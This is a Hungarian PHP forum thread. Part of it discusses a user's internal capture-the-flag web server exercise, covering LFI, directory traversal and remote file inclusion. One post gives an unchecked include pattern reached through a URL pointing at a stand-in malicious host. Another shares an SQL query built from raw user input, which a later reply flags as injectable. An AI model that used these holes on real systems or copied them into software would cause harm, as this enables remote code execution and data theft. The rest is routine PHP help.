Hirdetés

2024. május 3., péntek

Gyorskeresés

Útvonal

Fórumok  »  Szoftverfejlesztés  »  PHP programozás (kiemelt téma)

Hozzászólások

(#18701) DNReNTi válasza MacCaine (#18700) üzenetére


DNReNTi
őstag

Nem feltetlenul kell a konkret peldat megosztani, linkekkel, hozzaferessel es koddal, teszem azt kaptal egy finom SQL injection-t, eleg megkerdezni mit tegyel ellene, min valtoztass, vagy mondjuk valami robot arto fajlt tol es futtata a szervereden, mit lehet tenni, esetleg hogyan authentikalj helyesen. :) Ezekre akkor is lehet valaszolni, ha az ember nem tudja pontosan melyik oldalrol van szo. No de nem okoskodok, ha privat, akkor legyen privat. :)

but without you, my life is incomplete, my days are absolutely gray

(#18702) disy68 válasza MacCaine (#18700) üzenetére


disy68
aktív tag

Miért, gondolom nem privát kulcsokat szeretnél megosztani? Nem attól lesz biztonságos az alkalmazás, hogy "nem tudja senki" mit használnak a háttérben, hanem a használt megoldás mennyire megbízható.

Indulásnak az OWASP lista jó lehet amúgy, ha biztonság a témakör.

“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude

(#18703) MacCaine válasza DNReNTi (#18701) üzenetére


MacCaine
őstag

Hátööö... Mondjuk úgy, hogy én a másik oldalon vagyok. :)

(#18704) DNReNTi válasza MacCaine (#18703) üzenetére


DNReNTi
őstag

Ja ertem. :U Ejnye.

but without you, my life is incomplete, my days are absolutely gray

(#18705) MacCaine válasza DNReNTi (#18704) üzenetére


MacCaine
őstag

Semmi rosszalkodásra nem kell gondolni, ez egy házi feladat jellegű dolog itt a cégen belül: egy virtuális gépen fut egy webszerver, és meg kell találni a behatolási ponto(ka)t. Sajnos a php tudásom még nem elég hozzá. :(

(#18706) Zedz válasza MacCaine (#18703) üzenetére


Zedz
addikt

Mesélj! :DDD

Szerk.: ja láttam. :))
Ehhez miért kell php? :F

[ Szerkesztve ]

(#18707) DNReNTi válasza MacCaine (#18705) üzenetére


DNReNTi
őstag

Konkretan a webszerverre valo betoreshez nem gondolnam, hogy a PHP lenne a belepesi pont. Ez inkabb linux/unix varazslat kellene hogy legyen. Ha konkretan egy PHP alapu alkalmazast akarsz felnyomni, az mas. Akkor jo kiindulasi alap amit disy68 linkelt. ;) En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit.

but without you, my life is incomplete, my days are absolutely gray

(#18708) disy68 válasza MacCaine (#18705) üzenetére


disy68
aktív tag

Na így más a helyzet kicsit. Mi az elvárás? Csak a php-s alkalmazás problémáit megtalálni vagy az egész rendszerét? Ha az előbbi, akkor a korábbi link, illetve ez segíthet.
Ha az utóbbi, akkor bonyolódik a helyzet. Ha a webszerver apache, akkor a linkelt oldalon elindulhatsz. Ezen kívül persze lehet az oprendszer is gyenge pont és máris jóval terjedelmesebb a lehetséges sebezhetőségek száma. Nem is beszélve az esetleges egymásra épülő hibák kihasználásáról.

“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude

(#18709) Zedz


Zedz
addikt

Vagy itasd le azt aki a feladatért felel, kérd el a szükséges információt, majd használd a friss tudást. Social engineering. :DDD :DDD

(#18710) MacCaine válasza Zedz (#18706) üzenetére


MacCaine
őstag

Mert php-ben van a webapp.

(#18707) DNReNTi

SQLi nem kellett, a webapp már megadta magát, a session lopás is megvolt. XSS az kicsit más tészta.

(#18708) disy68

Eljutottam valameddig, és a továbblépéshez kellene a php-s segítség. LFI megy, RFI nem, ezt kellene megoldanom valahogy. Vagy valami guru megmondja, hogy ez így nem lehetséges php-ben, és akkor keresek valami más sebezhetőséget.

(#18709) Zedz

Jó az ötlet. :D

[ Szerkesztve ]

(#18711) disy68 válasza MacCaine (#18710) üzenetére


disy68
aktív tag

RFI. Én olyannal találkoztam, hogy a routing volt megoldva ellenőrizetlen bemenetekkel szép url megoldásnál.

Pl: oldal.hu/aloldal

htaccess-el volt egy átirányítás RewriteRule ^(.*)$ /index.php?path=$1 [NC,L,QSA]

ahol az aloldal került a $path változóba, majd ez lett include-olva.
include_once($path);

Szóval meghívva a oldal.hu/http://gonoszoldal.hu/meggonoszabb_script.php
Az kerül meghívásra, hogy include_once('http://gonoszoldal.hu/meggonoszabb_script.php
');

“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude

(#18712) MacCaine válasza disy68 (#18711) üzenetére


MacCaine
őstag

Htaccess-t nem látok www-data jogokkal. Root kellene hozzá.

Most akkor senki nem ért a php-hez annyira, hogy segíteni tudna? :O

(#18713) sztanozs válasza MacCaine (#18712) üzenetére


sztanozs
veterán

Lehet, hogy hülye kérdés:
Biztos ott a fájl, nem lehet, hogy azért nem látod, mert nem is létezik? Vagy ott van, csak nem tudod olvasni?

JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...

(#18714) MacCaine válasza sztanozs (#18713) üzenetére


MacCaine
őstag

Ezt nem tudom eldönteni. Vagy ott van, csak a jogok miatt nem látom, vagy nincs ott. LFI-vel nem tudom megjeleníteni, ennyi.

(Egyébként kipróbáltam ezt az "oldal.hu/aloldal" dolgot, de nem működött.)

[ Szerkesztve ]

(#18715) sztanozs válasza MacCaine (#18714) üzenetére


sztanozs
veterán

próbáld meg létrehozni a fájlt.

JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...

(#18716) DNReNTi válasza MacCaine (#18714) üzenetére


DNReNTi
őstag

Egyebkent mi a vegso cel? Hasznalhatatlanna tenni az appot? Lenyulni az adatokat, fajlokat? Vagy beinject-elni valami szkriptet es hosszabb tavon felhasznaloi adatokat lopni? Csak kivancsi vagyok. :)

but without you, my life is incomplete, my days are absolutely gray

(#18717) MacCaine válasza sztanozs (#18715) üzenetére


MacCaine
őstag

Egy változóban van egy string (alkönyvtár), amihez hozzáfűz egy másik stringet (fájlnév). Ezt a második stringet tudom változtatni és beírogatni más fájlneveket, elérési utakat. Ha meg tudnám csinálni, hogy egy scriptet is lefuttasson, akkor a .htaccess kiíratása lenne az utolsó gondolatom. :)

(#18716) DNReNTi

A "/root/capture_the_flag.txt" file tartalma. :)
Nincsenek adatok, fájlok, ez egy kifejezetten erre a célra létrehozott vbox image.

[ Szerkesztve ]

(#18718) DNReNTi válasza MacCaine (#18717) üzenetére


DNReNTi
őstag

Ertem ertem. :)
En meg mindig inkabb maganak a szervernek (apache/nginx) a toresevel probalkoznek inkabb. Mondom ezt ugy, hogy nem ertek hozza, de valamiert azt gondolom az celravezetobb lehet. De lehet hulyeseg.

but without you, my life is incomplete, my days are absolutely gray

(#18719) sztanozs válasza MacCaine (#18717) üzenetére


sztanozs
veterán

feltölteni tudsz az oldalra (és directory traversal)?

JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...

(#18720) MacCaine válasza sztanozs (#18719) üzenetére


MacCaine
őstag

Feltölteni nem tudok, dir traversal megy, a www-data user jogaival tudok megnézni dolgokat. Egyelőre semmi érdekes. Amit lehet, config fájlok, ilyesmi, azt már végignéztem.

(#18721) PumpkinSeed válasza MacCaine (#18720) üzenetére


PumpkinSeed
addikt

A fájl jogosultságait nem tudod megnézni, az ilyeneket úgy szokták megoldani, hogy a group owner az nem root és tudsz futtatni valami fájlt aminek azonos a group ownere mint a flag-nek.

[ Szerkesztve ]

"Akinek elég bátorsága és türelme van ahhoz, hogy egész életében a sötétségbe nézzen, elsőként fogja meglátni benne a fény felvillanását." - Kán

(#18722) sztanozs válasza MacCaine (#18720) üzenetére


sztanozs
veterán

config fájlokban nincsenek db hozzáférési adatok?

JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...

(#18723) MacCaine válasza sztanozs (#18722) üzenetére


MacCaine
őstag

MySQL user és jelszó is megvan.

(#18724) DNReNTi


DNReNTi
őstag

Ez mar amugy lassan megert volna egy "Hacker" topik nyitast. :)

but without you, my life is incomplete, my days are absolutely gray

(#18725) MacCaine válasza DNReNTi (#18724) üzenetére


MacCaine
őstag

Ezért is kezdtem úgy, hogy privátban ki tudna segíteni. :)

(#18726) DNReNTi válasza MacCaine (#18725) üzenetére


DNReNTi
őstag

Nincs ezzel baj, mert engem is erdekel a tema, csak segiteni nem nagyon tudok mer hulye vagyok hozza. :DDD De ha lenne ilyen topik, en olvasgatnam.

but without you, my life is incomplete, my days are absolutely gray

(#18727) Zedz válasza DNReNTi (#18726) üzenetére


Zedz
addikt

++++ :K :K :K

(#18728) sztanozs válasza Zedz (#18727) üzenetére


sztanozs
veterán

Csináltam topikot, hogy át tudjunk vonulni oda:
https://itcafe.hu/tema/white_hat/friss.html

[ Szerkesztve ]

JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...

(#18729) Tapsi


Tapsi
addikt

Ti hogyan valósítanátok meg egy foglalási rendszer kosarát? Nekem csak az jut eszembe, hogy nem sessionben tárolom a tételeket, hanem adatbázisban, és így on the fly leveszi polcról, ha valaki más megnézni.

(#18730) fordfairlane

Igen, ezt úgy küszöbölném ki, hogy mondjuk 15 percen belül meg kell rendelnie a terméket, különben törlődik a kosár. Nagyjából így működnek azok a rendszerek, amelyekkel találkoztam (mozi, színház).

[ Szerkesztve ]

(#18730) fordfairlane válasza Tapsi (#18729) üzenetére


fordfairlane
veterán

Ennek a módszernek az a hátránya, hogy amíg valakinek él a kosara, addig foglalva tartja az adott tételt. Ami lehet extrém hosszú idő is.

[ Szerkesztve ]

x gon' give it to ya

(#18731) fordfairlane válasza Tapsi (#18729) üzenetére


fordfairlane
veterán

Igen, ezt úgy küszöbölném ki, hogy mondjuk 15 percen belül meg kell rendelnie a terméket, különben törlődik a kosár. Nagyjából így működnek azok a rendszerek, amelyekkel találkoztam (mozi, színház).

Én még nem csináltam ilyen rendszert, ahol így kellett kezelni a kosarat, de így elsőre jónak tűnik.

x gon' give it to ya

(#18732) zeix


zeix
senior tag

Sziasztok!

A segítségeteket szeretném kérni, hogy jól működik-e a script amit írtam, mert már kezdek belekeveredni.
:)
Szerintem jó, de lehet kihagytam valamit, vagy egyszerűbben is meglehet oldani.
A lényeg hogy két dátum (hónap, nap) között döntse el a program, hogy beleesik-e az adott időpont, a két dátum közé, vagy nem.
:K

$ev = '2017';
//$ev = date("Y");
$mostdatum = strtotime("2017-10-05");
//$mostdatum = strtotime("now");

$szezonkezdet='09-01';
$szezonveg='05-30';

$eveleje = strtotime($ev."-01-01");
$evvege = strtotime($ev."-12-31");

$datum1 = date($ev."-".$szezonkezdet);
$datum2 = date($ev."-".$szezonveg);

$ezevszezonkezdet = strtotime($datum1);
$ezevszezonveg = strtotime($datum2);

if ($mostdatum >= $eveleje AND $mostdatum <= $ezevszezonveg)
{
$time1 = strtotime($datum1."-1 year");
$time2 = strtotime($datum2);
}

if ($mostdatum >= $ezevszezonveg AND $mostdatum <= $ezevszezonkezdet)
{
$time1 = strtotime($datum1."-1 year");
$time2 = strtotime($datum2);
}

if ($mostdatum >= $ezevszezonkezdet AND $mostdatum <= $evvege)
{
$time1 = strtotime($datum1);
$time2 = strtotime($datum2."+1 year");
}

if ($mostdatum <= $ezevszezonkezdet AND $mostdatum >= $ezevszezonveg)
{
$time1 = strtotime($datum1);
$time2 = strtotime($datum2);
}

echo date('Y-m-d', $time1);
echo '<br>';
echo date('Y-m-d', $mostdatum);
echo '<br>';
echo date('Y-m-d', $time2);

if ($mostdatum > $time1 AND $mostdatum < $time2)//szezon
{
echo 'ok';
}
else
{
echo 'error';
}

[ Szerkesztve ]

(#18733) DS39 válasza zeix (#18732) üzenetére


DS39
nagyúr

hát ha két dátum között döntenéd el, akkor ennél egyszerűbb lenne a kód, de te tulajdonképpen 4 dátum között döntöd el. 2016-09-01, 2017-05-30, 2017-09-01, 2018-05-30

(#18734) zeix válasza DS39 (#18733) üzenetére


zeix
senior tag

Igen, mert csak hónap és nap van megadva. Év nincs megadva a szezon változóiban.
Azt ki kell számolni, hogy a jelenlegi dátum a tavalyi év szezon kezdet és az idei év szezonvég között van-e.
pl kezdet:09-01 vég:04-01 a jelenlegi dátum pedig 10-01. de lehet 01-01 is. Ilyenkor kell a tavalyi év 09-01-et venni kezdetnek.

[ Szerkesztve ]

(#18735) DS39 válasza zeix (#18734) üzenetére


DS39
nagyúr

értem. :)
elsőre azt gondoltam túl bonyolítottad, de ha ez volt a cél, akkor jó így.

(#18736) Tapsi


Tapsi
addikt

Következő kérdés: ti hogy implementálnátok egy jó kereső logikát? Én eddig string konkatenációt használtam több keresőszó esetén és azt toltam be adatbázisba.

Tegyük fel, hogy van egy termékeket taralmazó adatbázisom műszaki cikkeknek. A keresést nyilván szótártáblákra futtatom, a kapcsolat most mindegy. Legyen márkanév, típus, megnevezés tábla és ugyanezzel a névvel mezők.

$sql = "SELECT markanev, tipus, megnevezes FROM markanev, tipus, megnevezes WHERE 1=1"

foreach($keresoszavak as $keresoszo){

$sql .= "AND (markanev LIKE '%".$keresoszo."%' OR tipus LIKE '%".$keresoszo."%' OR megnevezes LIKE '%".$keresoszo."%')"

}

Ez csak egy példa, nyilván mindenki ismeri. Biztos van ennél kulturáltabb módszer, ti mire esküsztök?

(#18737) PumpkinSeed

Az kimaradt, hogy osztott tárhelyes LAMP környezetben.

[ Szerkesztve ]

(#18737) PumpkinSeed válasza Tapsi (#18736) üzenetére


PumpkinSeed
addikt

Elasticsearch, Solr

"Akinek elég bátorsága és türelme van ahhoz, hogy egész életében a sötétségbe nézzen, elsőként fogja meglátni benne a fény felvillanását." - Kán

(#18738) biker válasza Tapsi (#18736) üzenetére


biker
nagyúr

Szerintem ez már itt rossz
SELECT markanev, tipus, megnevezes FROM markanev, tipus, megnevezes
meg a lezáró ;-k stb
ezt most csak ide bepötyögted, nem másoltad éles kódból...

[ Szerkesztve ]

Elektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |

(#18739) Tapsi válasza biker (#18738) üzenetére


Tapsi
addikt

Nyilván a logika a lényeg, nem kimásoltam.

(#18740) biker válasza Tapsi (#18739) üzenetére


biker
nagyúr

nem szép, de ez is működő megoldás, ha saját főből kell írni.
Persze pdo-val még szebb lenne.
Persze indexelt táblán, mert különben 10-20mp is lehet egy 100.000 soros táblában 3-4 szóra keresni.

Aztán ezért lehet megköveznek, mert ez még mysql_* féle megoldás volt, de én mondjuk a match-against párossal keresnék, mert akkor a rendezést lehet score alapján végezni, mennyire releváns az összetett keresés

$termekek = mysql_query("SELECT *, MATCH (termek_nev, termek_leiras, termek_cikkszam, termek_szall_code, termek_ean) AGAINST ('$keresett*' IN BOOLEAN MODE) AS score FROM webshop_termekek WHERE MATCH (termek_nev, termek_leiras, termek_cikkszam, termek_szall_code, termek_ean) AGAINST('$keresett*' IN BOOLEAN MODE) ORDER BY $order LIMIT {$_POST['start']},$lapozas");

ez egy működő copypaste
és nem kell ciklusban összefűzni a szavakat.

Elektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |

(#18741) fordfairlane válasza biker (#18740) üzenetére


fordfairlane
veterán

Nemcsak a mysql_* használata miatt rossz ez a példakód, hanem a sqlinjectionös stringösszefűzéses query miatt is.

[ Szerkesztve ]

x gon' give it to ya

(#18742) hcl


hcl
félisten
LOGOUT blog

Hello,

Hülye kérdés.
Linuxon futtatok egy shell scriptet PHP-ból. A kimenetét hogyan tudom/hogyan érdemes elkapni, hogy tudjam formázni?
Gondolom ha a script kimenetében HTML tageket generálok, az nem lesz értelmezve.
Köszi bármilyen ötletet :)

Mutogatni való hater díszpinty

(#18743) alpihun


alpihun
senior tag

Halik.

Egy szövegalapú böngészős játékot írok (mint a sárkányölő pl) és akárhogy kerülgetem szerveridős matekezéssel meg mindenféle megoldásokkal, szükségem lenne arra, hogy tudjak dolgokat előre meghatározott időnként auto megcsinálni, pl cselekvéslimit, shop kínálatfrissítés stb..
Mire van ezekhez szükségem?

ui: wampserverrel dolgozom w10en

[ Szerkesztve ]

Bagoly mondja verébnek, hogy nagy a feje, búsuljon a ló.

(#18744) DNReNTi válasza alpihun (#18743) üzenetére


DNReNTi
őstag

Cron a kulcsszo amit keresel. ;)

but without you, my life is incomplete, my days are absolutely gray

(#18745) alpihun válasza DNReNTi (#18744) üzenetére


alpihun
senior tag

Azt lehet csak úgy mezeileg is? Amiket én kaptam az vagy linuxon van vagy laravel framework. S linux nem lesz szóval kezdjek el laravelt tanulni vagy vagy van olyan megoldás ami barát a wampserveres apache-mysql-php kombóval?

[ Szerkesztve ]

Bagoly mondja verébnek, hogy nagy a feje, búsuljon a ló.

(#18746) alpihun válasza alpihun (#18745) üzenetére


alpihun
senior tag

Vagy linuxxal jobban járnék?

Bagoly mondja verébnek, hogy nagy a feje, búsuljon a ló.

(#18747) DNReNTi válasza alpihun (#18746) üzenetére


DNReNTi
őstag

Windowson nem lehet cronjobokat beallitani, de az elkepzelheto, hogy van ra valami 3rd party tool. Ettol fuggetlenul, en inkabb a linuxos kornyezetet javasolnam. Az idozitett hatterfolyamat pedig nem framework fuggo, tehat tok mindegy, hogy Laravel, vagy Codeigniter, vagy akarmi.

but without you, my life is incomplete, my days are absolutely gray

(#18748) DNReNTi válasza hcl (#18742) üzenetére


DNReNTi
őstag

Terminalban akarod latni a kimenetet?
Ha igen, a formazasi lehetosegek eleg korlatozottak, kiiratni az echo, es a print csalad fuggvenyeivel tudsz, illetve feladat fuggvenyeben megfontolando output buffering hasznalata.

but without you, my life is incomplete, my days are absolutely gray

(#18749) hcl válasza DNReNTi (#18748) üzenetére


hcl
félisten
LOGOUT blog

Hello,
Nem, HTML-re akarom kirakni. Az echo $output működik, csak nagyon fapadosan néz ki.

Mutogatni való hater díszpinty

(#18750) DNReNTi válasza hcl (#18749) üzenetére


DNReNTi
őstag

Ah, ertem, akkor egyszerubb a helyzet. A HTML tagek a bongeszo altal feldolgozodnak, tehat siman megjelenik, ugyan ugy mintha az egy mezei HTML file lenni.
Peldaul xyz.php file tartalma teszem azt:

<?php
$title = 'Hello World';
?>

<h1>
<?php echo $title; ?>
</h1>

but without you, my life is incomplete, my days are absolutely gray

Útvonal

Fórumok  »  Szoftverfejlesztés  »  PHP programozás (kiemelt téma)
Copyright © 2000-2024 PROHARDVER Informatikai Kft.